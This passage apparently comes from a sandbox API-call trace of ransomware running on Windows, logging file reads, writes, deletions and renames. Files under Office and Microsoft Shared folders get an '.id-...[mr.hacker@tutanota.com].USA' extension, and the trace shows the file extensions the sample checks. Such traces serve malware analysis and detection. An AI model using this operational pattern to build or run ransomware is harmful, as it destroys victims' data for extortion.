hTemplateFile=0x0) returned 0x1f0 [0056.312] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=4096) returned 1 [0056.312] CloseHandle (hObject=0x1f0) returned 1 [0056.312] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui")) returned 0x20 [0056.313] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0056.313] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0056.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0056.313] lstrlenW (lpString=".doc") returned 4 [0056.313] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0056.313] lstrlenW (lpString=".docx") returned 5 [0056.313] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0056.313] lstrlenW (lpString=".pdf") returned 4 [0056.313] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0056.313] lstrlenW (lpString=".xls") returned 4 [0056.313] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0056.313] lstrlenW (lpString=".xlsx") returned 5 [0056.313] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0056.313] lstrlenW (lpString=".ppt") returned 4 [0056.313] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0056.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0056.313] lstrlenW (lpString=".zip") returned 4 [0056.313] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0056.313] lstrlenW (lpString=".rar") returned 4 [0056.313] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0056.313] lstrlenW (lpString=".bz2") returned 4 [0056.313] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0056.313] lstrlenW (lpString=".7z") returned 3 [0056.313] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0056.313] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0056.313] lstrlenW (lpString=".dbf") returned 4 [0056.313] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0057.244] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\InkObj.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0057.260] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\micaut.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\micaut.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0057.261] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\mraut.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\mraut.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0057.276] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.277] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.277] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0057.277] GetLastError () returned 0x0 [0057.277] ReadFile (in: hFile=0x1f0, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x665a0, lpOverlapped=0x0) returned 1 [0057.289] WriteFile (in: hFile=0x1f8, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0x665b0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x665b0, lpOverlapped=0x0) returned 1 [0057.296] ReadFile (in: hFile=0x1f0, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0057.296] WriteFile (in: hFile=0x1f8, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0057.296] SetEndOfFile (hFile=0x1f8) returned 1 [0057.297] CloseHandle (hObject=0x1f8) returned 1 [0057.297] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.297] SetEndOfFile (hFile=0x1f0) returned 1 [0057.540] CloseHandle (hObject=0x1f0) returned 1 [0057.540] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0057.541] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\msclientdatamgr\\mscdm.dll")) returned 1 [0057.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0057.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0057.541] lstrlenW (lpString=".doc") returned 4 [0057.541] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.541] lstrlenW (lpString=".docx") returned 5 [0057.541] lstrcmpiW (lpString1=".docx", lpString2="M.DLL") returned -1 [0057.541] lstrlenW (lpString=".pdf") returned 4 [0057.541] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.541] lstrlenW (lpString=".xls") returned 4 [0057.541] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.541] lstrlenW (lpString=".xlsx") returned 5 [0057.541] lstrcmpiW (lpString1=".xlsx", lpString2="M.DLL") returned -1 [0057.541] lstrlenW (lpString=".ppt") returned 4 [0057.541] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0057.541] lstrlenW (lpString=".zip") returned 4 [0057.541] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.541] lstrlenW (lpString=".rar") returned 4 [0057.541] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.541] lstrlenW (lpString=".bz2") returned 4 [0057.541] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.542] lstrlenW (lpString=".7z") returned 3 [0057.542] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0057.542] lstrlenW (lpString=".dbf") returned 4 [0057.542] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0057.542] lstrlenW (lpString=".1cd") returned 4 [0057.542] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0057.542] lstrlenW (lpString=".jpg") returned 4 [0057.542] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0057.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0057.542] lstrlenW (lpString=".doc") returned 4 [0057.542] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.542] lstrlenW (lpString=".docx") returned 5 [0057.542] lstrcmpiW (lpString1=".docx", lpString2="M.DLL") returned -1 [0057.542] lstrlenW (lpString=".pdf") returned 4 [0057.542] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.542] lstrlenW (lpString=".xls") returned 4 [0057.542] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.542] lstrlenW (lpString=".xlsx") returned 5 [0057.542] lstrcmpiW (lpString1=".xlsx", lpString2="M.DLL") returned -1 [0057.542] lstrlenW (lpString=".ppt") returned 4 [0057.542] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0057.542] lstrlenW (lpString=".zip") returned 4 [0057.542] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.542] lstrlenW (lpString=".rar") returned 4 [0057.542] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.542] lstrlenW (lpString=".bz2") returned 4 [0057.542] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.542] lstrlenW (lpString=".7z") returned 3 [0057.543] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0057.543] lstrlenW (lpString=".dbf") returned 4 [0057.543] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0057.543] lstrlenW (lpString=".1cd") returned 4 [0057.543] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\MSClientDataMgr\\MSCDM.DLL") returned 72 [0057.543] lstrlenW (lpString=".jpg") returned 4 [0057.543] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.543] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0057.543] lstrlenW (lpString="ACEWSTR.DLL") returned 11 [0057.543] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0057.733] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=862608) returned 1 [0057.733] CloseHandle (hObject=0x210) returned 1 [0057.733] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll")) returned 0x20 [0057.733] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.733] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0057.733] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.733] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.734] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0057.734] GetLastError () returned 0x0 [0057.734] ReadFile (in: hFile=0x210, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0xd2990, lpOverlapped=0x0) returned 1 [0057.756] WriteFile (in: hFile=0x168, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xd29a0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xd29a0, lpOverlapped=0x0) returned 1 [0058.147] ReadFile (in: hFile=0x210, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0058.147] WriteFile (in: hFile=0x168, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0058.147] SetEndOfFile (hFile=0x168) returned 1 [0058.779] CloseHandle (hObject=0x168) returned 1 [0058.932] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0058.932] SetEndOfFile (hFile=0x210) returned 1 [0058.939] CloseHandle (hObject=0x210) returned 1 [0058.939] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.939] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acewstr.dll")) returned 1 [0058.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0058.939] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0058.939] lstrlenW (lpString=".doc") returned 4 [0058.939] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0058.940] lstrlenW (lpString=".docx") returned 5 [0058.940] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0058.940] lstrlenW (lpString=".pdf") returned 4 [0058.940] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0058.940] lstrlenW (lpString=".xls") returned 4 [0058.940] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0058.940] lstrlenW (lpString=".xlsx") returned 5 [0058.940] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0058.940] lstrlenW (lpString=".ppt") returned 4 [0058.940] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0058.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0058.940] lstrlenW (lpString=".zip") returned 4 [0058.940] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0058.940] lstrlenW (lpString=".rar") returned 4 [0058.940] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0058.940] lstrlenW (lpString=".bz2") returned 4 [0058.940] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0058.940] lstrlenW (lpString=".7z") returned 3 [0058.940] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0058.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0058.940] lstrlenW (lpString=".dbf") returned 4 [0058.940] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0058.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0058.940] lstrlenW (lpString=".1cd") returned 4 [0058.940] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0058.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0058.940] lstrlenW (lpString=".jpg") returned 4 [0058.940] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0058.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0058.940] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0058.940] lstrlenW (lpString=".doc") returned 4 [0058.940] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0058.940] lstrlenW (lpString=".docx") returned 5 [0058.940] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1 [0058.940] lstrlenW (lpString=".pdf") returned 4 [0058.941] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0058.941] lstrlenW (lpString=".xls") returned 4 [0058.941] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0058.941] lstrlenW (lpString=".xlsx") returned 5 [0058.941] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1 [0058.941] lstrlenW (lpString=".ppt") returned 4 [0058.941] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0058.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0058.941] lstrlenW (lpString=".zip") returned 4 [0058.941] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0058.941] lstrlenW (lpString=".rar") returned 4 [0058.941] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0058.941] lstrlenW (lpString=".bz2") returned 4 [0058.941] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0058.941] lstrlenW (lpString=".7z") returned 3 [0058.941] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0058.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0058.941] lstrlenW (lpString=".dbf") returned 4 [0058.941] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0058.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0058.941] lstrlenW (lpString=".1cd") returned 4 [0058.941] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0058.941] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEWSTR.DLL") returned 72 [0058.941] lstrlenW (lpString=".jpg") returned 4 [0058.941] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0058.941] lstrcmpiW (lpString1=".DLL", lpString2=".USA") returned -1 [0058.941] lstrlenW (lpString="ACEDAO.DLL") returned 10 [0058.941] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0058.942] GetFileSizeEx (in: hFile=0x210, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=744888) returned 1 [0058.942] CloseHandle (hObject=0x210) returned 1 [0058.942] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll")) returned 0x20 [0058.942] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0058.942] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0058.943] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0058.943] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0058.943] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0058.943] GetLastError () returned 0x0 [0058.943] ReadFile (in: hFile=0x210, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0xb5db8, lpOverlapped=0x0) returned 1 [0058.957] WriteFile (in: hFile=0x1c4, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xb5dc0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xb5dc0, lpOverlapped=0x0) returned 1 [0059.919] ReadFile (in: hFile=0x210, lpBuffer=0x3bc0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0059.919] WriteFile (in: hFile=0x1c4, lpBuffer=0x3bc0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3bc0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xe8, lpOverlapped=0x0) returned 1 [0059.920] SetEndOfFile (hFile=0x1c4) returned 1 [0059.920] CloseHandle (hObject=0x1c4) returned 1 [0059.920] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0059.920] SetEndOfFile (hFile=0x210) returned 1 [0059.926] CloseHandle (hObject=0x210) returned 1 [0059.926] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0059.926] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acedao.dll")) returned 1 [0059.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0059.926] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0059.926] lstrlenW (lpString=".doc") returned 4 [0059.926] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0059.926] lstrlenW (lpString=".docx") returned 5 [0059.926] lstrcmpiW (lpString1=".docx", lpString2="O.DLL") returned -1 [0059.926] lstrlenW (lpString=".pdf") returned 4 [0059.926] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0059.926] lstrlenW (lpString=".xls") returned 4 [0059.926] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0059.926] lstrlenW (lpString=".xlsx") returned 5 [0059.926] lstrcmpiW (lpString1=".xlsx", lpString2="O.DLL") returned -1 [0059.926] lstrlenW (lpString=".ppt") returned 4 [0059.927] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0059.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0059.927] lstrlenW (lpString=".zip") returned 4 [0059.927] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0059.927] lstrlenW (lpString=".rar") returned 4 [0059.927] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0059.927] lstrlenW (lpString=".bz2") returned 4 [0059.927] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0059.927] lstrlenW (lpString=".7z") returned 3 [0059.927] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0059.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0059.927] lstrlenW (lpString=".dbf") returned 4 [0059.927] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0059.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0059.927] lstrlenW (lpString=".1cd") returned 4 [0059.927] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0059.927] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEDAO.DLL") returned 66 [0059.927] lstrlenW (lpString=".jpg") returned 4 [0059.927] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0059.927] 